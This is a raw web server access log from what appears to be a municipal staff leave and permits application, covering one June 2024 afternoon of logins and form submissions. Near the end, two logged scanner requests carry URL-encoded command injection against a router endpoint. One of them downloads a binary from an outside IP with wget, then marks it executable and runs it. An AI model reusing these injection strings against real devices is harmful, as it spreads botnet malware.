190.171.142.50 - - [19/Jun/2024:16:34:55 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1741
190.171.142.50 - - [19/Jun/2024:16:35:02 -0300] "POST /cormun/servlet/hlogin?69ee7cfb5a1f0143d15d81d06d0bbb5c,gx-no-cache=1718825562519 HTTP/1.1" 200 90
190.171.142.50 - - [19/Jun/2024:16:35:02 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 958
190.171.142.50 - - [19/Jun/2024:16:35:02 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 12682
190.171.142.50 - - [19/Jun/2024:16:35:08 -0300] "GET /cormun/servlet/trpermisosadjuntos?17477487,20240618084453,P, HTTP/1.1" 200 6303
190.171.142.50 - - [19/Jun/2024:16:35:09 -0300] "GET /cormun/servlet/permisosadjuntos?INS,17477487,P,20240618084453,, HTTP/1.1" 200 5626
190.171.142.50 - - [19/Jun/2024:16:35:10 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
190.171.142.42 - - [19/Jun/2024:16:35:15 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718825573260 HTTP/1.1" 200 5394
190.171.142.50 - - [19/Jun/2024:16:35:20 -0300] "POST /cormun/servlet/permisosadjuntos?69ee7cfb5a1f0143d15d81d06d0bbb5c,INS,17477487,P,20240618084453,, HTTP/1.1" 200 116
190.171.142.50 - - [19/Jun/2024:16:35:20 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1041
190.171.142.50 - - [19/Jun/2024:16:35:20 -0300] "GET /cormun/servlet/trpermisosadjuntos?17477487,20240618084453,P, HTTP/1.1" 200 6789
190.171.142.50 - - [19/Jun/2024:16:35:22 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 12743
190.171.142.50 - - [19/Jun/2024:16:35:26 -0300] "GET /cormun/servlet/trpermisosadjuntos?9452944,20240618085243,P, HTTP/1.1" 200 6308
190.171.142.50 - - [19/Jun/2024:16:35:27 -0300] "GET /cormun/servlet/permisosadjuntos?INS,9452944,P,20240618085243,, HTTP/1.1" 200 5625
190.171.142.50 - - [19/Jun/2024:16:35:27 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
190.171.142.42 - - [19/Jun/2024:16:35:28 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718825586969 HTTP/1.1" 200 4157
190.171.142.50 - - [19/Jun/2024:16:35:35 -0300] "POST /cormun/servlet/permisosadjuntos?69ee7cfb5a1f0143d15d81d06d0bbb5c,INS,9452944,P,20240618085243,, HTTP/1.1" 200 116
190.171.142.50 - - [19/Jun/2024:16:35:35 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1040
190.171.142.50 - - [19/Jun/2024:16:35:35 -0300] "GET /cormun/servlet/trpermisosadjuntos?9452944,20240618085243,P, HTTP/1.1" 200 6790
190.171.142.42 - - [19/Jun/2024:16:35:38 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718825596489 HTTP/1.1" 200 4157
190.171.142.50 - - [19/Jun/2024:16:35:46 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 12728
190.171.142.42 - - [19/Jun/2024:16:35:50 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718825608217 HTTP/1.1" 200 5404
190.171.142.50 - - [19/Jun/2024:16:35:52 -0300] "GET /cormun/servlet/trpermisosadjuntos?17521154,20240617140958,P, HTTP/1.1" 200 6298
190.171.142.50 - - [19/Jun/2024:16:35:55 -0300] "GET /cormun/servlet/permisosadjuntos?INS,17521154,P,20240617140958,, HTTP/1.1" 200 5617
190.171.142.50 - - [19/Jun/2024:16:35:55 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
190.171.142.42 - - [19/Jun/2024:16:36:03 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718825621647 HTTP/1.1" 200 4157
190.171.142.50 - - [19/Jun/2024:16:36:13 -0300] "POST /cormun/servlet/permisosadjuntos?69ee7cfb5a1f0143d15d81d06d0bbb5c,INS,17521154,P,20240617140958,, HTTP/1.1" 200 116
190.171.142.50 - - [19/Jun/2024:16:36:13 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1041
190.171.142.50 - - [19/Jun/2024:16:36:13 -0300] "GET /cormun/servlet/trpermisosadjuntos?17521154,20240617140958,P, HTTP/1.1" 200 6777
190.171.142.42 - - [19/Jun/2024:16:36:15 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718825633055 HTTP/1.1" 200 4157
190.171.142.50 - - [19/Jun/2024:16:36:17 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 12686
190.171.142.50 - - [19/Jun/2024:16:36:21 -0300] "POST /cormun/servlet/trpermisosgoce?69ee7cfb5a1f0143d15d81d06d0bbb5c,,gx-no-cache=1718825640689 HTTP/1.1" 200 9743
190.171.142.50 - - [19/Jun/2024:16:36:21 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
190.171.142.50 - - [19/Jun/2024:16:36:21 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
190.171.142.50 - - [19/Jun/2024:16:36:21 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_8d78a5_256x240.png HTTP/1.1" 404 1089
190.171.142.50 - - [19/Jun/2024:16:36:21 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_fafafa_40x100.png HTTP/1.1" 404 1097
190.171.142.50 - - [19/Jun/2024:16:36:23 -0300] "POST /cormun/servlet/trpermisosgoce?69ee7cfb5a1f0143d15d81d06d0bbb5c,,gx-no-cache=1718825643290 HTTP/1.1" 200 9724
190.171.142.50 - - [19/Jun/2024:16:36:25 -0300] "POST /cormun/servlet/trpermisosgoce?69ee7cfb5a1f0143d15d81d06d0bbb5c,,gx-no-cache=1718825645235 HTTP/1.1" 200 9680
190.171.142.42 - - [19/Jun/2024:16:36:31 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718825649679 HTTP/1.1" 200 4157
190.171.142.50 - - [19/Jun/2024:16:36:35 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1741
190.171.142.50 - - [19/Jun/2024:16:36:44 -0300] "POST /cormun/servlet/hlogin?69ee7cfb5a1f0143d15d81d06d0bbb5c,gx-no-cache=1718825663951 HTTP/1.1" 200 90
190.171.142.50 - - [19/Jun/2024:16:36:44 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 953
190.171.142.50 - - [19/Jun/2024:16:36:44 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4226
190.171.142.50 - - [19/Jun/2024:16:36:44 -0300] "GET /cormun/static/SmoothNavMenu/resources/images/right.gif HTTP/1.1" 200 860
190.171.142.42 - - [19/Jun/2024:16:36:44 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718825662797 HTTP/1.1" 200 5699
190.171.142.50 - - [19/Jun/2024:16:36:47 -0300] "GET /cormun/servlet/trautorizarpermisogoce? HTTP/1.1" 200 8443
190.171.142.50 - - [19/Jun/2024:16:36:47 -0300] "GET /cormun/static/gxcfg.js?2020121645532 HTTP/1.1" 200 953
190.171.142.50 - - [19/Jun/2024:16:36:47 -0300] "GET /cormun/static/trautorizarpermisogoce.js?2020121651492 HTTP/1.1" 200 34948
190.171.142.50 - - [19/Jun/2024:16:36:50 -0300] "POST /cormun/servlet/trautorizarpermisogoce?69ee7cfb5a1f0143d15d81d06d0bbb5c,,gx-no-cache=1718825669892 HTTP/1.1" 200 5551
190.171.142.50 - - [19/Jun/2024:16:36:51 -0300] "POST /cormun/servlet/trautorizarpermisogoce?69ee7cfb5a1f0143d15d81d06d0bbb5c,,gx-no-cache=1718825670777 HTTP/1.1" 200 5283
190.171.142.50 - - [19/Jun/2024:16:36:51 -0300] "POST /cormun/servlet/trautorizarpermisogoce?69ee7cfb5a1f0143d15d81d06d0bbb5c,,gx-no-cache=1718825671390 HTTP/1.1" 200 4529
190.171.142.42 - - [19/Jun/2024:16:36:59 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718825677339 HTTP/1.1" 200 5682
190.171.142.42 - - [19/Jun/2024:16:37:14 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718825692933 HTTP/1.1" 200 4157
190.171.142.42 - - [19/Jun/2024:16:37:27 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718825705633 HTTP/1.1" 200 4156
190.171.142.42 - - [19/Jun/2024:16:37:38 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718825716739 HTTP/1.1" 200 4156
190.171.142.42 - - [19/Jun/2024:16:37:46 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718825724879 HTTP/1.1" 200 4157
190.171.142.42 - - [19/Jun/2024:16:37:55 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718825733964 HTTP/1.1" 200 4155
190.171.142.42 - - [19/Jun/2024:16:38:10 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718825748944 HTTP/1.1" 200 5937
190.171.142.42 - - [19/Jun/2024:16:38:33 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718825771083 HTTP/1.1" 200 5934
190.171.142.42 - - [19/Jun/2024:16:38:48 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718825786887 HTTP/1.1" 200 5946
190.171.142.42 - - [19/Jun/2024:16:39:09 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718825807009 HTTP/1.1" 200 5399
205.210.31.204 - - [19/Jun/2024:16:40:15 -0300] "îê‰.›Wù+1‰›ÜØþ£šEìñçÒ/âÙ7#HW_ðR« 7àmÚÎHœöP<þ>½ þŽÙ ðÿ®/½r”2&À+À/À,À0̨̩À ÀÀ" 400 -
205.210.31.204 - - [19/Jun/2024:16:40:16 -0300] "ÊÆ±› „Èð{ " 400 -
190.171.142.42 - - [19/Jun/2024:16:41:43 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718825961054 HTTP/1.1" 200 4156
190.171.142.42 - - [19/Jun/2024:16:41:56 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718825974030 HTTP/1.1" 200 5705
190.171.142.42 - - [19/Jun/2024:16:42:09 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718825987380 HTTP/1.1" 200 5689
190.171.142.42 - - [19/Jun/2024:16:42:26 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718826004856 HTTP/1.1" 200 4156
190.171.142.42 - - [19/Jun/2024:16:42:39 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718826017652 HTTP/1.1" 200 4155
190.171.142.42 - - [19/Jun/2024:16:42:40 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718826018520 HTTP/1.1" 200 4156
190.171.142.42 - - [19/Jun/2024:16:42:54 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718826032641 HTTP/1.1" 200 4156
190.171.142.42 - - [19/Jun/2024:16:43:05 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718826043877 HTTP/1.1" 200 4157
190.171.142.42 - - [19/Jun/2024:16:43:06 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718826044523 HTTP/1.1" 200 4157
190.171.142.42 - - [19/Jun/2024:16:43:16 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718826054579 HTTP/1.1" 200 4156
190.171.142.42 - - [19/Jun/2024:16:43:28 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718826066657 HTTP/1.1" 200 5682
190.171.141.138 - - [19/Jun/2024:16:43:41 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1710
190.171.142.42 - - [19/Jun/2024:16:43:44 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718826082491 HTTP/1.1" 200 4157
190.171.141.138 - - [19/Jun/2024:16:43:47 -0300] "POST /cormun/servlet/hlogin?5a2f06d51f737cbb8b0c14682c60d551,gx-no-cache=1718826088355 HTTP/1.1" 200 90
190.171.141.138 - - [19/Jun/2024:16:43:47 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 940
190.171.141.138 - - [19/Jun/2024:16:43:48 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4464
190.171.141.138 - - [19/Jun/2024:16:43:51 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 14955
190.171.142.42 - - [19/Jun/2024:16:44:09 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718826107412 HTTP/1.1" 200 4155
190.171.142.42 - - [19/Jun/2024:16:44:29 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718826127130 HTTP/1.1" 200 5403
190.171.142.42 - - [19/Jun/2024:16:44:46 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718826144780 HTTP/1.1" 200 5688
190.171.142.42 - - [19/Jun/2024:16:45:02 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718826160004 HTTP/1.1" 200 5677
190.171.154.42 - - [19/Jun/2024:16:45:28 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1741
190.171.142.42 - - [19/Jun/2024:16:45:33 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718826190978 HTTP/1.1" 200 6637
190.171.142.42 - - [19/Jun/2024:16:45:51 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718826209612 HTTP/1.1" 200 4157
190.171.142.42 - - [19/Jun/2024:16:46:24 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718826240547 HTTP/1.1" 200 4156
190.171.142.42 - - [19/Jun/2024:16:46:39 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718826257354 HTTP/1.1" 200 6416
190.171.142.42 - - [19/Jun/2024:16:46:55 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718826273116 HTTP/1.1" 200 4157
190.171.142.42 - - [19/Jun/2024:16:47:05 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718826283480 HTTP/1.1" 200 4157
190.171.142.42 - - [19/Jun/2024:16:47:06 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718826284381 HTTP/1.1" 200 4157
190.171.142.42 - - [19/Jun/2024:16:47:27 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718826305469 HTTP/1.1" 200 4157
190.171.142.42 - - [19/Jun/2024:16:47:56 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718826334290 HTTP/1.1" 200 5397
190.171.142.42 - - [19/Jun/2024:16:48:15 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718826353844 HTTP/1.1" 200 5682
190.171.142.42 - - [19/Jun/2024:16:49:42 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718826440586 HTTP/1.1" 200 7130
190.171.142.42 - - [19/Jun/2024:16:53:36 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718826674273 HTTP/1.1" 200 5394
190.171.142.42 - - [19/Jun/2024:16:53:49 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718826687304 HTTP/1.1" 200 6416
190.171.142.42 - - [19/Jun/2024:16:55:07 -0300] "POST /cormun/servlet/trlicencias?3f51e448ccb3449f8079981fc3a43f8d,,gx-no-cache=1718826765708 HTTP/1.1" 200 6423
186.103.157.42 - - [19/Jun/2024:16:58:52 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1723
186.103.157.42 - - [19/Jun/2024:16:58:55 -0300] "POST /cormun/servlet/hlogin?7b47844b43c945cb626741f173ff0bae,gx-no-cache=1718827915537 HTTP/1.1" 200 90
186.103.157.42 - - [19/Jun/2024:16:58:55 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 952
186.103.157.42 - - [19/Jun/2024:16:58:55 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4382
186.103.157.42 - - [19/Jun/2024:16:59:01 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 11467
190.171.153.26 - - [19/Jun/2024:17:00:09 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1714
190.171.153.26 - - [19/Jun/2024:17:00:09 -0300] "GET /cormun/static/Resources/indicator.gif HTTP/1.1" 304 -
190.171.153.26 - - [19/Jun/2024:17:00:09 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1724
190.171.153.26 - - [19/Jun/2024:17:00:13 -0300] "POST /cormun/servlet/hlogin?f5681e152d5a79d9382eda823957b740,gx-no-cache=1718827073177 HTTP/1.1" 200 90
190.171.153.26 - - [19/Jun/2024:17:00:13 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 947
190.171.153.26 - - [19/Jun/2024:17:00:13 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4288
190.171.154.42 - - [19/Jun/2024:17:01:17 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1722
190.171.154.42 - - [19/Jun/2024:17:01:25 -0300] "POST /cormun/servlet/hlogin?64892788abc032f1201eb07a7ea8c63f,gx-no-cache=1718827146702 HTTP/1.1" 200 90
190.171.154.42 - - [19/Jun/2024:17:01:25 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 953
190.171.154.42 - - [19/Jun/2024:17:01:26 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3868
190.171.154.42 - - [19/Jun/2024:17:01:28 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 11171
190.171.154.42 - - [19/Jun/2024:17:01:41 -0300] "POST /cormun/servlet/trpermisosgoce?64892788abc032f1201eb07a7ea8c63f,,gx-no-cache=1718827162214 HTTP/1.1" 200 7366
190.171.154.42 - - [19/Jun/2024:17:01:44 -0300] "POST /cormun/servlet/trpermisosgoce?64892788abc032f1201eb07a7ea8c63f,,gx-no-cache=1718827165490 HTTP/1.1" 200 104
190.171.154.42 - - [19/Jun/2024:17:01:44 -0300] "POST /cormun/servlet/trpermisosgoce?64892788abc032f1201eb07a7ea8c63f,,gx-no-cache=1718827165609 HTTP/1.1" 200 7345
190.171.154.42 - - [19/Jun/2024:17:01:44 -0300] "GET /cormun/PermisosGoce-4865.xls HTTP/1.1" 200 6656
190.171.154.42 - - [19/Jun/2024:17:02:39 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 9777
190.171.154.42 - - [19/Jun/2024:17:02:50 -0300] "POST /cormun/servlet/trlicencias?64892788abc032f1201eb07a7ea8c63f,,gx-no-cache=1718827231592 HTTP/1.1" 200 6883
190.171.154.42 - - [19/Jun/2024:17:02:53 -0300] "POST /cormun/servlet/trlicencias?64892788abc032f1201eb07a7ea8c63f,,gx-no-cache=1718827234420 HTTP/1.1" 200 101
190.171.154.42 - - [19/Jun/2024:17:02:53 -0300] "POST /cormun/servlet/trlicencias?64892788abc032f1201eb07a7ea8c63f,,gx-no-cache=1718827234545 HTTP/1.1" 200 6861
190.171.154.42 - - [19/Jun/2024:17:02:53 -0300] "GET /cormun/Licencias-7764.xls HTTP/1.1" 200 6144
190.171.141.122 - - [19/Jun/2024:17:05:43 -0300] "-" 400 -
190.171.141.122 - - [19/Jun/2024:17:05:43 -0300] "QVµ¼.‰XsD 'Ìã£`¾Ä£– À¯Ú’.}ÛË× H³PK=©àáñk6o$0ãX ŸÔÀÚüíÊ\­ø¹¨æÈ« ::À+À/À,À0̨̩ÀÀœ/5°ŠŠ servicioos.cormun.cl" 400 -
190.171.141.122 - - [19/Jun/2024:17:05:43 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1723
190.171.141.122 - - [19/Jun/2024:17:05:44 -0300] "GET /cormun/static/gxtimezone.js?85251 HTTP/1.1" 200 5781
190.171.141.122 - - [19/Jun/2024:17:05:44 -0300] "GET /cormun/static/Resources/Spanish/PXTools.css?1759030 HTTP/1.1" 200 100853
190.171.141.122 - - [19/Jun/2024:17:05:44 -0300] "GET /cormun/static/gxgral.js?85251 HTTP/1.1" 200 384558
190.171.141.122 - - [19/Jun/2024:17:05:44 -0300] "GET /cormun/static/gxcfg.js?2022112219184450 HTTP/1.1" 200 953
190.171.141.122 - - [19/Jun/2024:17:05:44 -0300] "GET /cormun/static/messages.spa.js?85251 HTTP/1.1" 200 30736
190.171.141.122 - - [19/Jun/2024:17:05:44 -0300] "GET /cormun/static/Resources/CormunLogin.png HTTP/1.1" 200 19132
190.171.141.122 - - [19/Jun/2024:17:05:44 -0300] "GET /cormun/static/hlogin.js?2022112219184458 HTTP/1.1" 200 2156
190.171.141.122 - - [19/Jun/2024:17:05:44 -0300] "GET /cormun/static/Resources/PXToolsLoginTop.png HTTP/1.1" 200 1337
190.171.141.122 - - [19/Jun/2024:17:05:44 -0300] "GET /cormun/static/Resources/PXToolsLoginBackground.png HTTP/1.1" 200 1164
190.171.141.122 - - [19/Jun/2024:17:05:44 -0300] "GET /cormun/static/Resources/PXToolsButtonLeft.png HTTP/1.1" 200 1310
190.171.141.122 - - [19/Jun/2024:17:05:48 -0300] "GET /cormun/static/Resources/PXToolsLoginBottom.png HTTP/1.1" 200 1389
190.171.141.122 - - [19/Jun/2024:17:05:48 -0300] "GET /cormun/static/Resources/PXToolsButtonRight.png HTTP/1.1" 200 1294
190.171.141.122 - - [19/Jun/2024:17:05:48 -0300] "GET /cormun/static/Resources/PXToolsButtonBackground.png HTTP/1.1" 200 1176
190.171.141.122 - - [19/Jun/2024:17:05:48 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1732
190.171.141.122 - - [19/Jun/2024:17:05:48 -0300] "GET /cormun/static/Resources/PXToolsButtonRight.png HTTP/1.1" 200 1294
190.171.141.122 - - [19/Jun/2024:17:05:48 -0300] "GET /cormun/static/Resources/PXToolsLoginBottom.png HTTP/1.1" 200 1389
190.171.141.122 - - [19/Jun/2024:17:05:48 -0300] "GET /cormun/static/Resources/PXToolsButtonBackground.png HTTP/1.1" 200 1176
190.171.141.122 - - [19/Jun/2024:17:05:48 -0300] "GET /cormun/static/Resources/indicator.gif HTTP/1.1" 200 1553
190.171.141.122 - - [19/Jun/2024:17:05:49 -0300] "GET /favicon.ico HTTP/1.1" 200 21630
190.171.153.26 - - [19/Jun/2024:17:10:50 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 10588
190.171.153.26 - - [19/Jun/2024:17:10:52 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
190.171.153.26 - - [19/Jun/2024:17:11:01 -0300] "POST /cormun/servlet/trlicencias?f5681e152d5a79d9382eda823957b740,,gx-no-cache=1718827721488 HTTP/1.1" 200 12845
190.171.153.26 - - [19/Jun/2024:17:15:55 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1723
190.171.153.26 - - [19/Jun/2024:17:15:55 -0300] "GET /favicon.ico HTTP/1.1" 200 21630
190.171.153.26 - - [19/Jun/2024:17:16:01 -0300] "POST /cormun/servlet/hlogin?26085a533af4b833fbddcfd94cbbaaf9,gx-no-cache=1718828047888 HTTP/1.1" 200 90
190.171.153.26 - - [19/Jun/2024:17:16:01 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 954
190.171.153.26 - - [19/Jun/2024:17:16:01 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3971
190.171.153.26 - - [19/Jun/2024:17:16:03 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 10268
190.171.153.26 - - [19/Jun/2024:17:16:08 -0300] "POST /cormun/servlet/trlicencias?26085a533af4b833fbddcfd94cbbaaf9,,gx-no-cache=1718828054741 HTTP/1.1" 200 7806
190.171.153.26 - - [19/Jun/2024:17:16:12 -0300] "POST /cormun/servlet/trlicencias?26085a533af4b833fbddcfd94cbbaaf9,,gx-no-cache=1718828058863 HTTP/1.1" 200 7806
190.171.153.26 - - [19/Jun/2024:17:16:21 -0300] "POST /cormun/servlet/trlicencias?26085a533af4b833fbddcfd94cbbaaf9,,gx-no-cache=1718828067599 HTTP/1.1" 200 7806
190.171.153.26 - - [19/Jun/2024:17:16:23 -0300] "POST /cormun/servlet/trlicencias?26085a533af4b833fbddcfd94cbbaaf9,,gx-no-cache=1718828070374 HTTP/1.1" 200 7806
190.171.153.26 - - [19/Jun/2024:17:16:29 -0300] "POST /cormun/servlet/trlicencias?26085a533af4b833fbddcfd94cbbaaf9,,gx-no-cache=1718828076238 HTTP/1.1" 200 7806
45.148.10.174 - - [19/Jun/2024:17:19:14 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 1013
45.148.10.174 - - [19/Jun/2024:17:19:15 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 1013
190.171.142.42 - - [19/Jun/2024:17:24:07 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1740
181.73.125.243 - - [19/Jun/2024:17:24:13 -0300] "‚Ó8Ö eqt_š•NXÊ«¢OrÔ÷_F{‰nþ#;`2 X éh›pæ\Îö[|Ê" 400 -
181.73.125.243 - - [19/Jun/2024:17:24:13 -0300] "ü) œ®b®Î~q^*ÆIûМš›hˆÂú‰¤Êšïޘz‚ BSâÿ¦Dý]Æ`\ñ؂N9q=Îô„„æ¥ÆnÓüƒ˜ À+À/À,À0̨̩ÀÀœ/5“::3+)ºº \³%vµÑwg+]o‘&€¹O€DÅůNÍ5Xð#þ ºÊ ú!•}Û-ã¿|aeë£àíø(ãð6˜·œ('òUGVö#OF5çÃÜ@G¨ëYgp¯Š®A4‡ò:²ÃW—)õ‘íIŠßÿÊ_žtSÉ¢zSbÈ8¸Úl`ðÃ[Ý·Wö?é1Üi kÐ"H]"ÖÎ&Ù¥h­¬âº¨Ö÷C7 ’¬/Õù'ÊyÊaË:žÖYòM€U¢Ü„³p œì¦äY¨¡J#H—ŽôæGÒšservicioos.cormun.cl h2http/1.1 " 505 -
181.73.125.243 - - [19/Jun/2024:17:24:25 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1721
181.73.125.243 - - [19/Jun/2024:17:24:25 -0300] "GET /cormun/static/gxtimezone.js?85251 HTTP/1.1" 200 5781
181.73.125.243 - - [19/Jun/2024:17:24:25 -0300] "GET /cormun/static/Resources/Spanish/PXTools.css?1759030 HTTP/1.1" 200 100853
181.73.125.243 - - [19/Jun/2024:17:24:25 -0300] "GET /cormun/static/gxcfg.js?2022112219184450 HTTP/1.1" 200 953
